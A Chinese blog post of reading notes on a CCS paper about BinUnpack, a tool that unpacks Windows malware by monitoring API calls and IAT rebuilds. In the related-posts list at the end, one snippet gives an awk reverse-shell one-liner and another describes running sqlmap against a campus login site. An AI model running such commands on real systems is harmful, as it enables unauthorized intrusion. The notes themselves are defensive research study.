论文阅读笔记-Towards Paving the Way for Large-Scale Windows Malware Analysis

已于 2023-02-27 16:11:47 修改
阅读量211 收藏
点赞数
分类专栏: 信息安全 深度学习/自然语言处理 文章标签: windows 论文阅读 microsoft
于 2021-05-30 16:56:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43199509/article/details/117400332
版权

CCS
Towards Paving
the Way for Large-Scale Windows Malware Analysis:
Generic Binary Unpacking with Orders-of-Magnitude Performance
Boost
https://rbonichon.github.io/asi36/papers/p395-cheng.pdf

摘要部分
1.文中指出打包工具会混淆API调用的标准用法,恶意软件使用导入地址表IAT来充当动态链接的API查找表,而IAT在打包时会被打包工具删除,并在解包时IAT会在代码还原前重建。
打包的恶意软件在运行期间,如果通过查找重建的IAT成功调用了API,那么说明恶意软件中原本的payload已被还原
2.提出了一种解包方法,之前的解包方法会受到恶意软件“现写后执行”的影响,文中提出的解包方法通过对API进行监控来分析恶意软件

第一章 介绍
1.文中列举了一些恶意软件反分析技巧,如通过“先写后执行”的方式来规避检测,且这种“先写后执行”的方法可以进行多次迭代加大检测难度,但
恶意软件中的payload总会与windows系统进行恶意交互,其大部分恶意软件会调用用户级API而不是本机API,因为大多数API语义信息在本机级别上是缺失的
2.通常二进制代码通过访问PE头的IAT来解析Windows API的地址,该IAT是调用
动态链接库(DLL)导出的API时的地址查找表。payload中涉及的Windows API含有与恶意软件相关的丰富语义,因此可以为安全分析人员分析恶意软件提供便利

第二章 背景与动机
1.文中强调可以通过观察api的调用来确定恶意软件解包的结束,即如果通过查找重建的IAT调用了API,则表明原始
代码已还原,并且执行流程已达到OEP,所以可以通过查找第一个使用重建后的IAT来调用的API,然后回溯来找到OEP
2.由于编译器在编译时不知道DLL API地址,因此PE文件必须动态解析DLL API地址,主要有两种方式:标准API解析,又名隐式链接;动
态API解析,也就是显式链接。前者通过访问PE文件头的导入地址表(IAT)获取API地址,后者必须进行函数调用以显式加载
DLL并在运行时获取导入函数地址。

第三章 概述
1.文中指出payload IAT的重建在进入OEP之前,在程序运行时若通过重建的IAT调用API那么说明payload代码已经被还原
文中提出的BinUnpack通过监控API的调用来追溯OEP

第四章 api监视器
在这里插入图片描述

  1. 文中首先指出通过监控用户级api和内核级api具有一定的局限性,并列举了一些恶意软件逃避api监控的方法。
  2. 文中的binunpack通过dll劫持的方法,用自定义的dll文件替换系统默认dll文件,来实现api监控,因大部分恶意软件都会调用NtMapViewOfSection

在这里插入图片描述
3. 文中提到了另一种非标准显示链接方式,不调用NtMapViewOfSection来加载dll,而是通过调用 “ CreateFile” , “ ReadFile”和“ VirtualAlloc”将DLL映射到非文件映射的内存中。不过binunpack依然可以通过监控内核级别的“ NtCreateFile”来捕获特征、加载自定义的dll文件。

第五章IAT比较
1.binunpack会仿制需要劫持的dll,并将用于监视的代码添加到每个api中

2.lastIAT这个变量代表最近一次重建的IAT,如果“ currentIAT”与 “ lastIAT”不同,则表明存在“重新建表再调用”的阶段,如果相同则将执行流程、参数等转发到原始API,以便继续拆包。在第7行之后,代码对OEP(第8行)执行回溯搜索。如果找到OEP (第9行),将首先恢复受此打包程序保护的解压缩代码(第 10行),然后更新“ lastIAT”(第11行)以进行下一轮比较。
在这里插入图片描述

第六章 OEP搜索以及过程存储
1.文中说明的查找过程:首先找到用于重建payload的IAT(图1中的“ T1”)的最后一 个“ GetProcAddress”的检查点, 然后从payload(“ T2”) 中确定第一个API调用的检查点,OEP会在这两者之间,同时使用了Binshape,一种二进制库函数匹配来快速识别自定义导入API的内存特征
在这里插入图片描述
在这里插入图片描述
2.文中提到了恶意软件会把PE头的访问设置为NO_ACESS,Binunpack使用了进程转储工具Scylla来应对这种情况

7.可能的攻击和应对手段
1.文中列举了几种Binunpack可能受到的攻击,如恶意软件可以没有IAT,但这样会使得恶意软件的运行变得极不稳定且兼容性低,或者恶意软件使用伪造的IAT, Binunpack通过一种叫做MalGene的方法来绕过伪造的API调用
2.恶意软件可以对dll文件进行哈希计算来确认内核是否被修改,Binunpack使用了shadow walker rootkit来应对,其原理是将自定义的DLL的数据转发给目标DLL,并将自定义DLL的代码转发给自身。

8 评估
1.恶意软件样本来自VX Heaven(http://vxheaven.org/),VirusShare(http://virusshare.com/)和VirusTotal,在实验前通过签名匹配工具
具Exeinfo PE(http://exeinfo.atwebpages.com/)和PEiD(https://www.aldeid.com/wiki/PEiD)来排除未打包的文件样本以 及仅受代码虚拟化保护的样本,
2.文中提到了因为没有恶意软件的源码,所以判断恶意软件是否解包完成的指标是熵偏差和代码-数据比,未打包和打包的恶意软件之间的熵偏差约为0.4,当恶意软件解包时代码与数据的比率会增加,阈值一般为0.5。文中提到了有些恶意软件会刻意降低熵,但是这会使得代码-数据比增加

梦想闹钟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【2022 小目标检测综述】Towards Large-Scale Small Object Detection: Survey and Benchmarks
梁瑛平的博客
07-31 2821
本文的主要贡献有: - 回顾了深度学习时代小目标检测的发展,并对该领域的最新进展进行了系统的调查,并对这些方法的优利弊进行了深入的分析; - 发布两个小目标检测的大规模基准,第一个专门用于驾驶场景,另一个专门用于空中场景。所提出的数据集是首次尝试为SOD量身定制的大规模基准测试; - 研究了几种具有代表性的目标检测方法在本文的数据集上的性能,并根据定量和定性的结果进行了深入的分析,有利于后续小目标检测的算法设计;...
Towards a Database System for Large-scale Analytics on Strings - PhD Thesis (2015)-计算机科学
04-22
Towards a Database System for Large-scaleAnalytics on StringsDissertation byMajed Ali SahliIn Partial Fulfillment of the Requirements for the Degree ofDoctor of PhilosophyKing Abdullah University of ...
PC恶意软件分析文献梳理2017-Executables Malware Analysis-wcventure
wcventure的博客
01-21 1645
This document collects papers that are related with PC executables analysis.
恶意软件的检测和攻击 文献整理
四个菜
01-19 7491
本文按照时间顺序整理了恶意软件攻防对抗近些年来的文献发表情况,希望能和对该领域感兴趣的研究人员做一个分享。 有些文献我只是大概地浏览了一下,如下文有错误,请为我指出来,感激不尽! 感兴趣的朋友可以在评论里交流(勿喷),或者可以认识一下(留下联系方式)。
【网安AIGC专题】46篇前沿代码大模型论文、24篇论文阅读笔记汇总
热门推荐
定期分享我的发现和想法,感谢你的陪伴和支持
11-27 1万+
本文为邹德清教授的《网络安全专题》课堂笔记系列的文章,本次专题主题为大模型。 本系列文章不仅涵盖了46篇关于前沿代码大模型的论文,还包含了24篇深度论文阅读笔记,全面覆盖了代码生成、漏洞检测、程序修复、生成测试等多个应用方向,深刻展示了这些技术如何在网络安全领域中起到革命性作用。同时,本系列还细致地介绍了大模型技术的基础架构、增强策略、关键数据集,以及与网络安全紧密相关的模型安全问题。 本篇博客旨在整理这些宝贵的笔记,方便未来的阅读和研究,同时也希望能够对广大读者产生启发和帮助。让我们一起踏上这场网络安
论文阅读笔记--Data-Free Knowledge Distillation for Heterogeneous Federated Learning(FEDGEN)
Shawn2134123的博客
01-19 6573
链接:https://arxiv.org/abs/2105.10056v2 这篇文章发表在ICML 2021,讲的是如何解决联邦学习中的数据异构问题。作者认为现有的知识蒸馏(Knowledge Distillation,K-D)的方法大多都需要server有一批代理数据(proxy data),协助K-D完成知识传授的过程,这有时候是做不到的。而且只修改全局模型并不能解决用户之间的异质性,反过来这还会影响全局聚合的质量。FEDGEN相比之前的算法有3个优越性: 1)不需要server拥有额外的数据; 2)K
Practical_Guide_to_LTE-A,_VoLTE_and_IoT_-_Paving_the_way_towards_5G(1).pdf
08-25
经典书籍Practical_Guide_to_LTE-A,_VoLTE_and_IoT_-_Paving_the_way_towards_5G
文献阅读-Towards Open World NeRF-Based SLAM
最新发布
12-18
【标题】: 开放世界NeRF-based SLAM技术探索 【描述】: 本文深入探讨了基于神经辐射场(NeRF)的开放世界SLAM(Simultaneous Localization and Mapping)技术,旨在提升SLAM系统的鲁棒性和跟踪准确性,以及适应未知...
论文研究-Towards the Construction Problem of ISTs on M?bius Cubes.pdf
08-15
关于莫比乌斯立方体上独立生成树的构造,程宝雷,樊建席,独立生成树能够用来提高广播方案的容错性和传输协议的安全性。国内外相关研究学者已经在超立方体、局部扭立方体、扭立方体等网络
论文研究-Towards A Noise-Tolerant Neural Network Model for Distant Supervised Relation Extraction.pdf
08-27
噪音鲁棒的神经网络关系抽取模型,姜廷松,穗志方,关系抽取的目标是从文本中自动抽取实体间关系,远程监督能够自动标注训练数据,使得关系抽取可以面向大规模语料展开。远程监督面临�
反弹shell失败 原来是这个原因
梦想闹钟
08-31 6184
在学习反弹shell的相关知识时,尝试在kali2上使用反弹shell 提示没有/dev/tcp 这是怎么回事呢?我百度了一下,大部分的说法是这个目录是bash创建的一个虚拟目录,但还是没有解决问题,最后在谷歌上找到了解释 https://evilpan.com/2021/04/25/reverse-shell/ 因此还是使用awk命令一句话反弹shell awk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/8080"; while(42) { do{ printf "shell
记一次校园网渗透经历
梦想闹钟
08-13 2965
首先注入点是这里,其实原来右边是没有这个通知公告的,加了以后就加出问题来了,这个其实是一个用于登录校园网wifi的网站 网址http://***/index.php/index/notice/id/1 点进去是一个上网须知 怀疑id/1中 1为注入点,上sqlmap!! sqlmap -u “http://**/index.php/index/notice/id/” --level 3 跑出来发现是一个注入点 然后接下来 --dbs 得到库名后用-D radius --tables看下表,这时候已经
tensorflow 拼接不同的神经网络结构
梦想闹钟
09-23 1970
最近尝试了将两个网络组合,下面的代码是将cnn和mlp网络进行组合的示例,输入CNN网络的特征维度是n40000,将其转化为n(200200)的维度输入到cnn网络中,卷积过后再和维度为n2500的特征结合,输入到mlp网络里去,最终输出是对应10分类的概率,关键是使用 layers.concatenate将不同网络的输出拼接起来,作为新网络的输入。同时,使用多个网络和多个输入时也需要提前声明多个Input层,以及model里的输入格式models.Model(inputs=[input1, input2]
信息安全常用会议介绍
梦想闹钟
05-18 1371
贴一个学长给的收录信息安全常用文章的网站 https://secpaper.cn/ 从知乎看过来的关于信息安全类会议的排名 https://www.zhihu.com/answer/145831681 Security A 类: S&P, B类: NDSS, USENIX Security, CCS C类:AsiaCCS, PETS, CT-RSA 可以看到,默认的搜索选项除了上述几个外还有IMC,DSN等会议,不过国内关于这些会议的介绍比较少,这里先记录下这些会议的全称等,之后有更多了解之后再更新
DNS隧道调研笔记
梦想闹钟
01-04 1110
DNS隧道调研笔记
ubuntu 18.04 lts 安装cuckoo沙箱踩坑记录
梦想闹钟
12-15 915
记录下安装沙盒cuckoo的过程,差不多花费了一个星期,这中间遇到了各种各样的坑 首先是安装系统,我是原来的系统是win10,安装ubuntu版本是18.04 lts Ubuntu 18.04官网下载地址: https://releases.ubuntu.com/18.04/ubuntu-18.04.5-desktop-amd64.iso.torrent?_ga=2.21914808.2028854723.1605333772-1051256952.1605169591 下载好之后,在我的电脑里进行划分硬盘
Data fountain 基于人工智能的恶意软件家族分类 参赛总结
梦想闹钟
11-01 908
我自己单独做的loss是在0.78左右,学长的方法loss能达到0.207左右 给的数据,是一个恶意软件去掉pe头的asm文件和对应的pe文件。此外,样本有分布不均的特点,因此在训练模型的时候需要注意加上对应的权重 我自己使用的方法是: 提取两部分特征,一部分是文件的区间熵+文件大小+2进制读取的时候0-255字节分别出现的数量+常用opcode出现的次数+字符串出现的数量,字符串最长长度,平均长度,这部分特征是长度2500的一维向量 第二部分是文件内容取前30万行,将其中以6个空格开头的行收集起来,筛去
用Python制作邮件检测器
梦想闹钟
02-27 819
使用python制作垃圾邮件email检测过滤器
余刚a method towards the ideal time-frequency representation for strongly no
11-17
强噪声的理想时频表示方法主要是为了在频域和时域上准确地表示出噪声信号。在处理强噪声信号时,我们希望减小噪声对信号的影响,从而更好地分析和提取信号的特征。 首先,为了处理强噪声信号,可以考虑使用适当的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值